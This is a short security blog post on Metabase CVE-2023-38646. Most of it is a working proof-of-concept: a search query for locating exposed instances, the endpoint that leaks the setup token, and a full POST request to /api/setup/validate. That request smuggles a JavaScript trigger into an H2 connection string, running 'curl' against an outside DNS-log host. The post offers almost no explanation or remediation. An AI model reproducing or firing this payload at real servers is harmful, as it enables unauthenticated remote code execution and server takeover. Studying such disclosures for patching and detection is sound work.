Metabase Validate Remote Command Execution Vulnerability Cve 2023 38646
Metabase Validate Remote Command Execution Vulnerability Cve 2023 38646
Metabase validate Remote Command Execution Vulnerability CVE-2023-38646
Vulnerability Description
Metabase is an open source data analysis and visualization tool that helps users easily connect to a variety of data sources, including databases, cloud services, and APIs, and then use an intuitive interface for data query, analysis, and visualization.
Vulnerability Impact
Metabase
Network surveying and mapping
app=”Metabase”
Vulnerability reappears
Login page
Verify POC
1
/api/session/properties
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
POST /api/setup/validate HTTP/1.1
Host:
Content-Type: application/json
Content-Length: 812
{
"token": "e56e2c0f-71bf-4e15-9879-d964f319be69",
"details":
{
"is_on_demand": false,
"is_full_sync": false,
"is_sample": false,
"cache_ttl": null,
"refingerprint": false,
"auto_run_queries": true,
"schedules":
{},
"details":
{
"db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('curl ecw14d.dnslog.cn')\n$$--=x",
"advanced-options": false,
"ssl": true
},
"name": "an-sec-research-team",
"engine": "h2"
}
}
This post is licensed under CC BY 4.0 by the author.